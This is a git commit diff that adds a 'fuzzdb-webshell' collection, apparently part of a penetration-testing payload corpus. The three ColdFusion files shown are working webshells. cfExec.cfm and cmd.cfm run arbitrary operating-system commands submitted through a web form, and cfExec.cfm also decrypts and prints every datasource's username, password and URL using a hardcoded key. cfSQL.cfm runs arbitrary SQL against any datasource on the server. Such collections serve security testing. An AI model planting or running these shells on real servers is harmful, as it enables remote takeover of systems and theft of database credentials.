fzuudb-webshell

2025-12-09 14:11:30 +00:00 · 2013-06-05 11:21:04 +08:00
parent 6a88226bfd
commit f06456a918
42 changed files with 5982 additions and 0 deletions
--- a/fuzzdb-webshell/cfm/cfExec.cfm
+++ b/fuzzdb-webshell/cfm/cfExec.cfm
@@ -0,0 +1,77 @@
+<html>
+<body>
+
+<!-- orig author: kGrutzmacher 	-->
+<!-- additshonz: lawKnee	-->
+<b>Notes:</b><br>
+<ul>
+<li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
+<li>For Windows options are the command you want to run "dir" "type" etc
+</ul>
+<p>
+
+<cfoutput>
+<table>
+<form method="POST" action="">
+<tr><td>Command:</td><td><input type=text name="cmd" size=50 
+  <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
+<tr><td>Options:</td><td> <input type=text name="opts" size=50 
+  <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
+<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4 
+  <cfif isdefined("form.timeout")>value="#form.timeout#"
+  <cfelse>value="5"</cfif>></td></tr>
+</table>
+<input type=submit value="Exec" >
+</form>
+
+<cfif isdefined("form.cmd")>
+<cfsavecontent variable="myVar">
+<cfexecute name = "#Form.cmd#"
+   arguments = "#Form.opts#" 
+   timeout = "#Form.timeout#">
+</cfexecute>
+</cfsavecontent>
+<pre>
+#HTMLCodeFormat(myVar)#
+</pre>
+</cfif>
+
+<cfscript>
+//The following code borrowed from hernanOchoa @hexale (thx)  
+//added better formatting on output and connection string [lb]
+
+// Create Data Source Object
+dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
+	getDatasourceService().getDatasources();
+	writeoutput("<br><br><b>Datasource Credentials:</b><br>");
+	writeoutput("<table>");
+// Loop Through DataSources
+for(i in dataSourceObb) {
+	if(len(dataSourceObb[i]["password"])){
+
+	// Get url
+	theurl=(dataSourceObb[i]["url"]);
+
+	// Get username
+	username=(dataSourceObb[i]["username"]);
+
+	// Get and decrypt password
+	decryptPassword=Decrypt(dataSourceObb[i]["password"],
+	generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
+     "Base64");
+	 
+	// Output datasource usernames, passwords, and urls
+	writeoutput("" & 
+	"<tr><td>DataSource: " & i & "</td>" & 
+	"<td>Username: " & username & "</td>" & 
+	"<td>Password: " & decryptPassword & 
+	"<td>URL: " & theurl & "</td></tr>");
+	}
+}
+writeoutput("</table><br>");
+</cfscript>
+</cfoutput>
+</body>
+</html>
+
+<!-- orig from mDaw bdoor --> 
--- a/fuzzdb-webshell/cfm/cfSQL.cfm
+++ b/fuzzdb-webshell/cfm/cfSQL.cfm
@@ -0,0 +1,64 @@
+<!-- foldFusion page by lawKnee							-->
+<!-- useful when you can upload cfm and would like to talk to all db's avail	-->
+<!-- but dont want to (or can't) connect from the OS				-->
+<!-- this page uses ServiceFactory to auto-enum all datasources on the instance	-->
+<!-- only works on CF8 and below, but unpatched CF9 should work too		-->
+
+<html>
+<body>
+<p><b>Notes:</b></p>
+<ul>
+<li>Select the database you want to use</li>
+<li>Write SQL statements in the text box</li>
+</ul>
+
+<form method="POST" action="">
+<p><b>SQL Interface:</b></p>
+Datasource<br>
+<select name="datasource">
+<cfscript>
+dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
+	getDatasourceService().getDatasources();
+	for(i in dataSourceObb) {
+	writeoutput('<option value="' & i & '">' & i & '</option>');
+	}
+</cfscript>
+</select>
+
+<br>
+SQL<br>
+<textarea name="sql" rows="5" cols="100"></textarea>
+<br>
+<input type=submit value="Exec">
+</form>
+
+<cfif isdefined("form.sql")>
+<cfquery name="runsql" datasource="#Form.datasource#" timeout="30">
+	#Form.sql#
+</cfquery>
+</cfif>
+
+<table border=1>
+    <cfif isdefined("form.sql")>
+    <cfloop from="0" to="#runsql.RecordCount#" index="row">
+        <cfif row eq 0>
+                <tr>
+                        <cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
+                                <th><cfoutput>#column#</cfoutput></th>  
+                        </cfloop>
+                </tr>
+        <cfelse>
+                <tr>
+                        <cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
+                                <td><cfoutput>#runsql[column][row]#</cfoutput></td>
+                        </cfloop>
+                </tr>
+        </cfif>
+    </cfloop>
+    </cfif>
+</table>
+
+
+
+</body>
+</html>
--- a/fuzzdb-webshell/cfm/cmd.cfm
+++ b/fuzzdb-webshell/cfm/cmd.cfm
@@ -0,0 +1,32 @@
+<html>
+<body>
+
+<cfoutput>
+<table>
+<form method="POST" action="">
+ <tr>
+  <td>Command:</td>
+  <td> < input type=text name="cmd" size=50<cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
+ </tr>
+ <tr>
+  <td>Options:</td>
+  <td> < input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
+ </tr>
+ <tr>
+  <td>Timeout:</td>
+  <td>< input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td>
+ </tr>
+</table>
+<input type=submit value="Exec" >
+</FORM>
+
+<cfsavecontent variable="myVar">
+<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
+</cfexecute>
+</cfsavecontent>
+<pre>
+#myVar#
+</pre>
+</cfoutput>
+</body>
+</html>